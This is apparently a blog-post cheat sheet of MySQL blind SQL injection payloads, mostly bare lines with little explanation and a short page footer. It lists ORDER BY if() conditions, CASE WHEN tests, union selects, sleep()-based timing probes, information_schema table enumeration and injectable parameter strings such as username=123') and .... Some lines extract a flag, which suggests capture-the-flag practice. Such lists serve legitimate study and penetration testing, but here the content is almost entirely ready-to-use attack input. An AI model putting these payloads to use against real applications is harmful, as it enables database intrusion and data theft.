Boolean Based
1.Order by
order by if(substr(@@version,1,1)='5',num,name)
Order by if((select(left((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),3))like(0x2562)),name,price)
order by if((substr((select user()),1,1)='r'),(select 1 from (select sleep(2)) as b),password);
if((select@a:=(select@b:=table_name+from{a+information_schema.tables}limit+1))=1,id,click)
order by if(left((select@a:=(select@b:=table_name from{a information_schema.tables}limit 1)),1)=0x63,host,user)
if(left((select@a:=(select@b:=(table_name)from{a(information_schema./**/tables)}where(table_schema)=0x7371/**/limit+1)),5)=0x64656465§65§,id,click)
2.Case when
select user from mysql.user where user='root' and (case when 1=2 then 1 else 0 end)=1
3.
username=123') and (if(substring(user(),09,1)='a',1,(select-1 union select-2))='a
provinceID=1 union select ord(substring(user(),1,1))#
4.
SELECT mid(lpad(bin(ord(mid(version(),1,1))),7,0),1,1)
if((substr((select user()),1,1)='r'),((select sleep(5) from information_schema.schemata as b)),1)
select if(1, (select user from user), 0)
bugtest') and (mid(user() from 1 for 1)='b
扫一扫
209
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
